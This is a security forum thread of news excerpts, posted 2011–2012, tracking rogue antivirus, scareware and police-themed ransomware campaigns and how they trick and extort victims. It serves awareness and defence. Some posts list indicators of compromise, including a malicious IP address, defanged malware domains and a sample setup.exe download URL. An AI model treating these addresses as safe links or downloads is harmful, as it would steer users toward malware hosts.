Jump to content


Photo

Rogue AV, AS, scareware, etc...


  • Please log in to reply
45 replies to this topic

#1 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 03 March 2011 - 04:57 AM

FYI...

Rogue AV different on each browser...
- http://research.zsca...-internals.html
March 2, 2011 - "... new type of Fake AV page that looks different on each browser . And it also uses internal elements of those browsers... The malicious executable InstallInternetDefender_722.exe is detected* by only 9.5% of AV!... The version displayed in Firefox... looks like the security warning Firefox shows for malicious and phishing sites... the Chrome version looks like a legitimate browser warning... For Safari, only the first popup box is tailored to the browser. The main page is the same as Internet Explorer..."
(Screenshots and more detail available at the URL above.)
* http://www.virustota...e1ce-1299087679
File name: InstallInternetDefender_722.exe
Submission date: 2011-03-02 17:41:19 (UTC)
Result: 4/42 (9.5%)
There is a more up-to-date report...
- http://www.virustota...e1ce-1299190654
File name: install_internetdefender.exe
Submission date: 2011-03-03 22:17:34 (UTC)
Result: 12/43 (27.9%)

:grrr:

Edited by AplusWebMaster, 04 March 2011 - 10:38 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#2 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 03 March 2011 - 06:55 PM

FYI...

ChronoPay scareware...
- http://krebsonsecuri...reware-diaries/
March 3, 2011 - "If your Windows PC has been hijacked by fake anti-virus software or “scareware” anytime in the past few years, chances are good that the attack was made possible by ChronoPay, Russia’s largest processor of online payments... ChronoPay also specializes in processing the transactions of so-called “high-risk” industries, including online pharmacies, tobacco sales, porn and software sales. A business is generally classified as high-risk when there is a great potential for credit card chargebacks and a fair chance that it will shut down or vanish without warning... ChronoPay, lists more than 75 pages of credit card transactions that the company processed from Americans who paid anywhere from $50 to $150 to rid their computers of imaginary threats found by scareware from creativity-soft .com... As security firm F-Secure noted* at the time, victims of this scam were informed that an “antipiracy foundation scanner” had found illegal torrents from the victim’s system, and those who refused to pay $400 via a credit card transaction could face jail time and huge fines..."
* http://www.f-secure....s/00001931.html

- http://www.f-secure....s/00002112.html
March 4, 2011

:grrr:

Edited by AplusWebMaster, 04 March 2011 - 05:53 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#3 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 14 March 2011 - 05:12 AM

FYI...

Rogue AV links from tsunami in Japan...
- http://isc.sans.edu/...l?storyid=10543
Last Updated: 2011-03-14 08:21:18 UTC - "... people are still surprised how quickly bad guys catch up with events in the real world - this is especially true for the RogueAV/FakeAV groups which constantly poison search engines in order to lure people into installing their malware. We can also see even many AV vendors warning people to be careful when they search for this or that (currently, obviously the search query that generates most attention is related to the disaster in Japan). While it is good to constantly raise awareness and warn people about what’s happening, one important thing to know is that the RogueAV/FakeAV guys poison search engines and modify their scripts automatically. This means that they are constantly on top of current trends and events in the world – whatever happens, their scripts will make sure that they “contain” the latest data/information about it... With the disaster in Japan striking on Friday we saw another RogueAV/FakeAV group heavily poisoning the search engines – even Google which normally removes them quickly still contains hundreds of thousands of such pages. Since this campaign can be easily identified, here is... the current count... 1.7 million pages (!!!). Keep in mind that there are multiple pages listed here with different search terms (they modify search terms through a single parameter), but the number is still staggering. According to Google, in past 24 hours there have been 14,200 such pages added so it’s clear that the bad guys are very active... the RogueAV/FakeAV guys can create very realistic pages that can, unfortunately as we’ve all witnessed, successfully poison search engines."

:ph34r: :grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#4 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 19 April 2011 - 08:13 AM

FYI...

Rogue AV - Easter cards...
- http://sunbeltblog.b...e-rogue-av.html
April 19, 2011 - "Looks like we have more shenanigans involving rogue AV products and Easter... Elsewhere there are malicious emails* doing the rounds - the Easter scams are in full swing..."
* http://www.net-secur...ews.php?id=1698

(Screenshots available at both URLs above.)

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#5 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 12 May 2011 - 12:21 PM

FYI...

Google doodle leads to scareware...
- http://www.h-online....es-1242208.html
12 May 2011 - "... it is rare for a click on a prominently positioned Google doodle to take you to links for fake virus scans... If a user clicks on the doodle to find out what it means, Google launches a search for the term the doodle refers to... On Wednesday, Google celebrated the 117th birthday of dance icon Martha Graham. Clicking on the doodle displayed a list of preview images of the modern art dancer, some of which were links to a scareware site... At present, a search for Martha Graham on Google still displays those images. Once on the scareware site the user is then offered the SecurityScanner.exe file for download in order to solve the alleged virus problem; the file contains malware. Only 4 of the 42 scanners used by Virustotal flagged the file as being a threat at 11am on Wednesday. A test conducted by The H's associates at heise Security revealed that the scareware managed to infect a Windows 7 system with Microsoft Security Essentials 2 (MSE2) enabled. The malware disabled MSE2 and added itself to the security centre as "Win 7 Home Security 2011" – and labelled itself as disabled. Users are then asked to pay €60 to activate it.
The infected system could no longer be used in any meaningful way. Warnings constantly popped up whenever any web page was visited regardless of which browser was used. The program does not appear on the list of installed software and therefore cannot be uninstalled easily. In similar cases, scareware could, with a lot of effort, be manually removed, but this software changed so many settings in the system that reinstalling Windows was the safest solution."
___

- http://blog.stopbadw...wedding-present
2011.04.29 - "... we have no reason to believe the site’s legitimate owners intended for this URL to exist. Rather, an attacker appears to have exploited a weakness in the site’s security model and inserted a -redirect- for the URL... the payload from this attack can be extremely annoying and costly — it makes the PC all but unusable — this sort of attack is certainly not of the most sophisticated or technically dangerous variety. A user who does -not- download or run the Fake AV executable does not appear to suffer compromise..."
> http://www.virustota...884b-1304097780
File name: SecurityScanner.exe
Submission date: 2011-04-29 17:23:00 (UTC)
Result: 4/42 (9.5%)
There is a more up-to-date report ...
- http://www.virustota...884b-1305388325
File name: 7978e13ab11b027fb22b6cb4ec16dd3f
Submission date: 2011-05-14 15:52:05 (UTC)
Result: 32/43 (74.4%)

:grrr: :ph34r: :grrr:

Edited by AplusWebMaster, 22 May 2011 - 02:17 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#6 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 17 May 2011 - 07:55 AM

FYI...

Scareware fakes HD failures...
- http://www.symantec....defragger-sales
16 May 2011 - "... Hard disk failures are a fact of life... Trojan.FakeAV writers are aware of this, and the end of last year saw a move by some into the creation of fake hard disk scanners and defragmentation tools... Trojan.Fakefrag. What sets this apart from standard fake disk cleanup utilities is that the Trojan makes changes on the computer and displays messages that make it appear as though the hard disk is failing. Then it drops a member of the UltraDefragger family called Windows Recovery, which offers to repair these disk errors for a mere $79.50!...
• It fakes hardware failure messages...
• It moves all the files in the "All Users" folder to a temporary location and hides files in the "Current User" folder. This makes it look like you have lost all the files on your desktop.
• It stops you from changing your background image.
• It disables the Task Manager.
• It sets both the “HideIcons” and “Superhidden” registry entries to give the impression that more icons have been deleted.
... the failure messages look just like something Windows would display..."
(Screenshots, video, and more detail available at the Symantec URL above.)
___

New scareware - charted
- http://blogs.mcafee....OG_110513_2.jpg
May 13, 2011

:grrr: :!: :ph34r:

Edited by AplusWebMaster, 18 May 2011 - 09:43 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#7 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 18 May 2011 - 11:09 PM

FYI...

Fake AV bingo - 165 domains of bad
- http://isc.sans.org/...l?storyid=10894
Last Updated: 2011-05-19 00:06:54 UTC ...(Version: 2) - "Can you guess which domains the crooks behind the Fake Anti-Virus Scam are going to use next? Well, neither can we. But for several weeks now, they are hosting a lot of their bad stuff out of 91.213.29.66, geo-located in... Russia... all in all 165 domains of badness.
Several of these domains were "found" by our readers via the poisoned Google image searches* that we reported earlier this month, and also via malicious advertisements embedded in perfectly benign web pages...
Fake AV has made its appearance on Macs**, where naive automatic download-and-run default settings in browsers still are common, and where "MacDefender" and its expected numerous successors and variants are likely to become as "successful" for the bad guys as their Windows version has been for years..."
* http://isc.sans.edu/...l?storyid=10822
2011-05-04
** http://isc.sans.edu/...l?storyid=10813
2011-05-02

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#8 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 20 May 2011 - 08:48 AM

FYI...

Mac Fake AV...
- http://news.cnet.com...064394-245.html
May 19, 2011 - "Macintosh users are being targeted with malware that poses as an antivirus warning and tries to trick people into paying for software they don't need. This ruse isn't new. So-called rogue antivirus has been hitting Windows machines for years. But this is the first time this type of malware has been written to target the much smaller Mac market... Mac Defender, also known as Mac Security and Mac Protector, is a fake antivirus program that is designed to scare people into thinking that their computers are infected with malware..."

- http://blog.intego.c...fake-antivirus/

- http://download.cnet...0064445-12.html
May 19, 2011 - "... On any platform, rogue antivirus programs are resistant to standard program removal procedures. This means you can't just drag one to the trash..."
(More detail on removal procedures at the above URL.)
___

- http://www.h-online....te-1246693.html
20 May 2011 - "... Users of the Safari web browser should disable automatic file opening in Safari (Preferences -> General and uncheck "Open 'safe' files after downloading"). More importantly though, users should, when prompted for their user name and password, be asking themselves "what is requesting this information" and remembering that they are giving it privileges to modify their system..."

:grrr: :ph34r:

Edited by AplusWebMaster, 20 May 2011 - 12:21 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#9 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 25 May 2011 - 06:53 AM

FYI...

Apple advisory on "MacDefender" malware
- http://isc.sans.edu/...l?storyid=10918
Last Updated: 2011-05-25 00:05:17 UTC

- http://support.apple.com/kb/HT4650
May 24, 2011 - "... Products Affected:
Mac OS X 10.4, Mac OS X 10.6, Mac OS X 10.5..."

Safari "Force Quit"
- http://support.apple.com/kb/ht3411

:ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#10 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 26 May 2011 - 05:53 AM

FYI...

MacDefender variant changes tactics...
- http://isc.sans.edu/...l?storyid=10927
Last Updated: 2011-05-26 08:11:01 UTC - "MacDefender... has upped the ante with a new version according to Intego* that does not need to ask the user's password any longer... it's not using an exploit to avoid asking the right to write in the /Applications directory, it simply installs the software and activates it for the current use only. Since most macs are using only a single user that changes little for the malware. But it removes the pop-up for your password. Anybody in the admin group can write to the /Applications directory..."
* http://www.intego.co...nt-macguard.asp
May 25, 2011 - "... effective SEO poisoning has led many Mac users to this type of malware, and no administrator password is required to install this new variant..."

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#11 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 31 May 2011 - 11:44 AM

FYI...

Fake Firefox SCAM leads to scareware...
- http://nakedsecurity...d-to-scareware/
May 30, 2011 - "... latest scam? They detect your user-agent string from your web browser and display a fake Firefox security alert if you are using the Mozilla Firefox web browser... Internet Explorer users get the standard "My Computer" dialog that appears to do a system scan inside their browser window... We are likely to continue to see these criminals targeting each operating system, browser and any other details that can be gleaned from HTTP requests sent from our devices. If you click the "Start Protection" button you will download the latest, greatest fake anti-virus program..."
(Screenshots available at the Sophos URL above.)

:grrr:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#12 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 06 June 2011 - 03:13 PM

FYI...

FakeRean - turns hard-core ...
- http://sunbeltblog.b...-hard-core.html
June 06, 2011 - "FakeRean was initially discovered by Microsoft* a couple of years ago. Like all rogue AV families, it displays fake scanning results to users in an effort to dupe them into coughing up cash in order to register the software and clean their systems supposedly. This family also alters the infected system's registry quite extensively and drops lots of component and shortcut files, among other things. What sets FakeRean apart from the usual rogues is its ability to hijack a file association for executable (.EXE) files, which allows it to reappear every time an application is run... page is found on SourceForge.net, a prominent repository of open-source software, as a profile page... get a free but malicious software to download and run on your systems once you click -any- of the buttons there. This software is a PDF exploit that, once installed, drops and also installs FakeRean. We detect the exploit as Exploit.PDF-JS.Gen... This SourceForge profile URL, and some 100+ other varying Web page URLs, is contained on imonline(dot)nl(slash)ukabefijac... All URLs are -redirect- via seoholding(dot)com... Be extra careful, if not steer clear all together, when visiting online profiles hosted on -any- site that -looks- suspicious."
(Screenshots available at the sunbeltblog URL above.)
* http://www.microsoft...=Win32/FakeRean

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#13 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 21 June 2011 - 06:06 AM

FYI...

Malware campaign injects Java exploit code
- http://community.web...ploit-code.aspx
20 Jun 2011 - "... detected a Rogue AV campaign that directly attacks the user's system instead of first redirecting to a dedicated attack server. Attackers usually compromise web pages to drive traffic to web servers hosting exploit kits. In this injection though, we see exploit code directly planted into legitimate pages... attacks an Oracle Java vulnerability (CVE-2010-4452) by exploiting a design flaw in the Java class loader to execute an unsigned Java applet with local user rights. The exploit affects Java Runtime Environment versions 6 Update 23 and earlier. It was addressed by Oracle with Update 24 in February 2011. In internal tests, we could confirm that the malicious applet would load in all popular browsers with built-in Java support like IE, Firefox, and Opera... The payload in this case is the nowadays ubiquitous Rogue Antivirus. In case you haven't already done so, don't forget to update your Java version* as soon as possible."
(Screenshots available at the Websense URL above.)
* http://www.java.com/...nload/index.jsp

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#14 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 20 July 2011 - 01:24 AM

FYI...

Google finds a million scareware infections...
- http://krebsonsecuri...to-be-infected/
July 19, 2011 - "Google today began warning more than a million Internet users that their computers are infected with a malicious program that hijacks search results and tries to scare users into purchasing fake antivirus software... the malware apparently arrives on victim desktops as fake antivirus or “scareware” programs that use misleading warnings about security threats to trick people into purchasing worthless security software... The malware intercepts traffic destined for high profile domains like google.com, yahoo.com and bing.com, and routes it through intermediate hosts or “proxies” controlled by the attackers. The proxies are used to modify the search results that a victim sees for any given search term, and to redirect traffic to pay-per-click schemes that pay for traffic to specific Web sites. Fortunately, the traffic generated by the malware has a unique “signature” that Google is able to use to alert victims. Google is placing a prominent notification* at the top of victims’ Google search results; it includes links to resources to help remove the infection... the hard work will be in the cleanup: Search hijackers are notorious for blocking users from visiting antivirus Web sites or other popular sources of malware removal tools."
* http://krebsonsecuri.../07/googhij.png
___

- http://googleonlines...eople-from.html
Updated July 20, 2011

:grrr: :ph34r:

Edited by AplusWebMaster, 21 July 2011 - 05:05 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#15 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 25 July 2011 - 10:46 AM

FYI...

Fake video codecs - with scareware
- http://threatpost.co...careware-072511
July 25, 2011 - "... Most scareware programs rely on Web-based pop-ups that appear when a victim visits a site that has been compromised. The user sees a dialog box that typically looks a lot like the Windows security center interface informing him that his machine is full of scary sounding malware... The goal, of course, is to get the unwitting victim to click on the dialog box and install whatever rogue AV tool they're pushing and then get him to pony up for the license fee. Now, researchers at GFI Labs* have come across a new breed of rogue AV that takes a less direct route to the victim's wallet. This attack, which is related to the FakeVimes family of scareware that Google recently began warning users about, installs some files on users' machines, but doesn't immediately start demanding payment in return for fictitious security services. Instead, it waits for a victim to try to play a Web video..."
* http://sunbeltblog.b...rs-up-home.html
"... a sample of some of the files found on the infected machine:
c:\Documents and Settings\All Users\Application Data\7f0924\VD7f0_2326.exe
c:\Documents and Settings\All Users\Application Data\ip\e.exe
c:\Documents and Settings\All Users\Application Data\ip\FRed32.dll
c:\Documents and Settings\All Users\Application Data\ip\instr.ini
c:\Documents and Settings\All Users\Application Data\ip\SmartGeare.exe
c:\Documents and Settings\All Users\Application Data\ip\spoof.avi
c:\WINDOWS\system32\c_726535.nls ..."

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#16 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 30 January 2012 - 11:31 AM

FYI...

Rogue activity spikes ...
- https://blogs.techne...Redirected=true
29 Jan 2012 - "... Lately, we have seen a resurgence in rogue activity (one particularly obnoxious threat going by the name Security Defender – aka Win32/Defmid – has been making the rounds of late); rogue security programs attempt to trick users into paying for -fake- antivirus software... Think twice before handing over your credit card details to a third party you cannot verify – like one displaying pop-ups, or on the end of an unsolicited phone call."
(Screenshots available at the URL above.)

:( :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#17 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 02 March 2012 - 11:08 AM

FYI...

Rogue rash ...
- https://blogs.techne...Redirected=true
1 Mar 2012 - "Rogue:Win32/FakePAV reappeared about two weeks ago after a brief hiatus and since then we’ve been seeing variants with new names for themselves just about every day. The latest versions call themselves names like “Windows Threats Destroyer”, “Windows Firewall Constructor”, "Windows Attacks Preventor" and “Windows Basic Antivirus”... Each sample of FakePAV is distributed as a self-extracting RAR archive, which contains a second self-extracting RAR archive. This second, “inner” archive contains the rogue executable itself, but it is password-protected; simply trying to extract it without knowing the password doesn’t work... In the last few days they’ve started obfuscating these scripts, probably to make it harder for anti-malware scanners to detect them. Because RAR self-extractor scripts are stored as part of the archive comment, essentially anything that the self-extractor doesn’t recognize as an instruction is ignored, meaning pretty much any text can be added without changing the functionality... These kind of tactics are aimed at making it difficult for anti-malware scanners to look inside the malware’s distribution package, and they highlight the need for real-time malware protection. For the malware to work, the malicious executable has to be written to disk at which point real-time protection can not only detect it but stop it from being executed..."
(Screenshots available at the URL above.)

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#18 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 05 March 2012 - 12:43 PM

FYI...

Mass injection wave of WordPress sites - Rogue AV ...
- http://community.web...ress-sites.aspx
5 Mar 2012 - "... Websense... has detected a new wave of mass-injections... The majority of targets are Web sites hosted by the WordPress content management system. At the time of writing, more than 200,000 Web pages have been compromised, amounting to close to 30,000 unique Web sites (hosts). The injection hijacks visitors to the compromised sites and rediects them to rogue AV sites that attempt to trick them into downloading and installing a Trojan onto their computer. The injected code is very short and is placed at the bottom of the page, just before </body> tag... After a three-level -redirection- chain, victims land on a fake AV site. In this example, the first chain is the ".rr.nu", and the landing site is the ".de.lv" top-level domain, but the landing site keeps changing. The rogue AV site appears to perform a scan on the computer and scares the user by displaying fake malware detections of various kinds of Trojans. The page looks like a Windows Explorer window with a "Windows Security Alert" dialogue box in it. The fake scanning process looks like a normal Windows application, however, it is only a pop-up window within the browser. The fake antivirus then prompts visitors to download and run their "antivirus tool" to remove the supposedly found Trojans. The executable is itself the Trojan... more than 85% of the compromised sites are in the United States, while visitors to these web sites are more geographically dispersed*... while the attack is specific to the US, everyone is at risk when visiting these compromised pages..."
* http://community.web..._5F00_GeoIP.png

> http://community.web...182.FakeAV3.png
___

- http://community.web...-protected.aspx
13 Mar 2012 - "... We checked several aspects of each of these compromised websites and concluded that most of them are served by Apache webserver and PHP environment*...
* http://community.web...tribution1s.png
... WordPress still serves the majority of the compromised websites; however, we did see a small amount of other CMS as well. We also noticed that an increasing number of Joomla sites** are also affected, with all other content managers making up a tinier slice...
** http://community.web...tribution2s.png
... having the latest version of WordPress does not make you immune to this threat...
> http://community.web...tribution3s.png
... some of the dominant attack vectors that websites using the latest WordPress version are likely to be exploited through:
• Weak passwords / stolen credentials
• Vulnerable third-party modules used in WordPress
• Security holes in the underlying server infrastructure, such as in the database server or the server side scripting engine (PHP in this case)..."

:grrr: :ph34r:

Edited by AplusWebMaster, 14 March 2012 - 10:01 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#19 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 15 March 2012 - 08:04 AM

FYI...

Rogue AV tweaked every 12 to 24 hours to avoid detection
- http://www.gfi.com/b...-threat-tactic/
Mar 13, 2012 - "... the trend that criminals behind bogus AV software are now distributing via spam that has links to sites where users can be further infected with the Blackhole exploit..."
- http://www.gfi.com/p...s-and-consumers
Mar 09, 2012 - "... Rogue AV programs are continually tweaked in an attempt to avoid detection, with newer variants of these malicious applications propagating every 12 to 24 hours... Trojans once again dominated the list, taking -half- of the top 10 spots..."
Top 10 Threat Detections for February
- http://www.gfi.com/c...tions-21084.png

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#20 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 24 March 2012 - 04:41 PM

FYI...

Flash-Based Fake AV - drive-by exploits and SPAM
- http://www.symantec....-risk-minimizer
23 Mar 2012 - "... relatively new fake antivirus application called Windows Risk Minimizer. The -fake- antivirus software was promoted through spam sent from a popular webmail service. This is slightly unusual as normally fake antivirus infections arrive through drive-by exploits. Spam messages promoting the fake antivirus software contained links to compromised domains, which then -redirected- users to the fake antivirus site. We witnessed over 300 compromised domains being used in just a few hours. When opening the fake antivirus site, the user is greeted with a JavaScript alert message, whereby the fake antivirus (referred to here as "Windows Secure Kit 2012") claims that your machine is infected... The page uses Flash making it look more convincing with realistic icons, progress bars, and dialog boxes. Unsurprisingly, the fake antivirus detects plenty of viruses. Decompressing the Flash file and analyzing it shows a huge list of files contained within it. The Flash movie then simply picks some of these at random and claims they are infected (with equally random virus names). Once the scan is complete, a Windows Security Alert dialog appears with a summary of the scan. This dialog can be moved around the screen and (for reasons unknown) the different infections can be selected and unselected... To avoid getting infected with fake antivirus software, ensure you keep your operating system, Web browser, and antivirus software up-to-date with all security patches..."
(Screenshots available at the URL above.)

:grrr: :ph34r:

Edited by AplusWebMaster, 24 March 2012 - 04:42 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#21 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 13 April 2012 - 08:16 AM

FYI...

New Fake AV scareware attempts to extort Torrent users
- http://www.theregist...onware_hyrbrid/
13 April 2012 - "Security researchers have discovered a strain of fake anti-virus software that tries to intimidate supposed file-sharers* into paying for worthless software. SFX Fake AV, first detected by freebie antivirus scanner firm Malwarebytes, blends the features of scareware with those more associated with ransomware Trojans. The malware stops any legitimate anti-virus package from running on compromised PCs, something common to other other scareware packages. But this particular strain of malware goes further than this by stopping Process Explorer (procexp.exe) and preventing browsers from loading – tactics designed to force marks to complete the ‘input credit card details’ screen and hand over money for the scamware... SFX Fake AV, first detected by freebie antivirus scanner firm Malwarebytes, blends the features of scareware with those more associated with ransomware Trojans. The malware stops any legitimate anti-virus package from running on compromised PCs, something common to other other scareware packages... the malware also performs a fake scan that classifies Windows Registry Editor as a porn tool. Bruce Harrison, VP Research at Malwarebytes, said: "SFX Fake AV is morphing at a relatively fast rate, so it is something that signature-based vendors will have to watch out for as there will be an increasing number of variants in the wild. Also, the use of Dropbox as a delivery mechanism is a something that the industry is going to have to take into account and protect against, as it is an emerging trend."
* http://regmedia.co.u...t_scareware.jpg

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#22 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 09 May 2012 - 12:20 PM

FYI...

Ransomware police trojan - now targets USA and Canada ...
- http://blog.trendmic...usa-and-canada/
May 9, 2012 - "The Police Trojan* has been targeting European users for about a year... the latest incarnations of this obnoxious malware have started targeting the United States and Canada. In the latest batch of C&C servers we have analyzed, not only has the list of countries increased but also their targets are now more specific. For instance, UKash vouchers are not available in the U.S., thus the U.S. fake police notification that -spoofs- the Computer Crime & Intellectual Property Section of the U.S. Department of Justice, only mentions PaySafeCard as the accepted payment method. The criminals also took the time in adding plenty of logos of local supermarkets and chain stores where the cash vouchers are available...
> http://blog.trendmic..._screenshot.jpg
... the same Eastern European criminal gangs who were behind the fake antivirus boom are now turning to the Police Trojan strategy. We believe this is a malware landscape change and not a single gang attacking in a novel way. We also found C&C consoles that suggest a high level of development and possible reselling of the server back-end software used to manage these attacks..."
* http://blog.trendmic...-police-trojan/
"... plagued by so called Police Trojans that lock their computer completely until they pay a fine of 100 euros..."

:ph34r: :grrr:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#23 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 31 May 2012 - 05:57 AM

FYI...

More extortion thru Ransomware
- http://www.ic3.gov/m...012/120530.aspx
May 30, 2012 - "... new Citadel malware platform used to deliver ransomware, named Reveton*. The ransomware lures the victim to a drive-by download website, at which time the ransomware is installed on the user's computer. Once installed, the computer freezes and a screen is displayed warning the user they have violated United States Federal Law. The message further declares the user's IP address was identified by the Computer Crime & Intellectual Property Section as visiting child pornography and other illegal content. To unlock their computer the user is instructed to pay a $100 fine to the US Department of Justice, using prepaid money card services. The geographic location of the user's IP address determines what payment services are offered. In addition to the ransomware, the Citadel malware continues to operate on the compromised computer and can be used to commit online banking and credit card fraud. Below is a screenshot of the warning:
> http://www.ic3.gov/images/120530.png
... This is an attempt to extort money with the additional possibility of the victim’s computer being used to participate in online bank fraud. If you have received this or something similar do -not- follow payment instructions..."

Reveton removal instructions:
* https://www.f-secure...2_reveton.shtml

:grrr: :!: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#24 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 19 June 2012 - 12:55 PM

FYI...

Fake AV malware campaign - 2012-06-19
- https://isc.sans.edu...l?storyid=13501
Last Updated: 2012-06-19 10:26:16 UTC - "... 'vulnerabilityqueerprocessbrittleness . in' is currently one of 600+ domains that link to a quite prevalent "Fake Anti-virus" malware campaign. Currently, the domains associated to this scam all point to web servers hosted in the 204.152.214.x address range, but of course the threat keeps "moving around" as usual... The current set of threats involves frequently changing malware EXEs (or EXEs inside of ZIPs) with low coverage on virustotal. The download URLs usually follow the pattern of http ://bad-domain. in/16 character random hex string/setup.exe or /setup.zip .
Example: http ://fail-safetytestingcontrol. in/fc1a9d5408b7e17d/setup.exe ..."

:grrr:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#25 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 20 September 2012 - 01:11 PM

FYI...

Ransomware-as-a-Service spotted in the wild
- http://blog.webroot....ed-in-the-wild/
Sep 20, 2012 - "... recently advertised DIY (do-it-yourself) managed voucher-based Police Ransomware service exclusively targeting European users...
Sample underground forum advertisement of the managed DIY Police Ransomware service:
> https://webrootblog....ice_managed.png
